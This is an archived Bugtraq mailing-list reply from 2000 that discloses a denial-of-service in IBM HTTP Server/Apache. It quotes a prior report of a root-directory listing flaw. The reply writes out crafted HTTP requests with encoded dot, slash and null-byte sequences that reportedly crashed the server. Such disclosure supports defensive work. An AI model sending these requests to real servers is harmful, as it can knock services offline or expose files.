[15158] in bugtraq
Re: IBM HTTP SERVER / APACHE (DoS)
daemon@ATHENA.MIT.EDU (H D Moore)
Thu Jun 1 22:38:49 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <3936803B.8036C277@secureaustin.com>
Date: Thu, 1 Jun 2000 10:24:43 -0500
Reply-To: H D Moore <hdm@SECUREAUSTIN.COM>
From: H D Moore <hdm@SECUREAUSTIN.COM>
X-To: Marek Roy <marek_roy@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
While I was poking around looking for more vulberabilities, I noticed
that sending a request like:
GET /DIR/.../ HTTP/1.0
would give me the same response as GET /DIR/ HTTP/1.0
So I sent off a request that looked like this:
GET /DIR/%2e%2e%2e%00%2e%2e HTTP/1.0
and the server told me /DIR/... was not found...
And finally I tried:
GET /DIR/%2e%2f%2e%2e%2e HTTP/1.0
And the server simple crashed, burned, and stopped accepting
connections. Whether the DoS was triggered by the earlier request
containing the null character or the single %2e%2f sequence is unknown.
Since I did not have access to the test machine's console, I dont know
what the impact besides the obvious DoS is...
Anyone running one of these and feel like playing?
-HD
http://www.secureaustin.com (spidermap/nlog/etc)
Marek Roy wrote:
>
> I haven't seen any advisories for IBM HTTP SERVER running
> Apache.
>
> There is a crucial number of "/" (forward slash) you can
> use to retrieve the contents of the root directory of this
> particular Web Server. Using this vulnerability, you can
> retrieve any files or scripts running from that directory
> and sub-directories.
[ snip ]
> Marek Roy
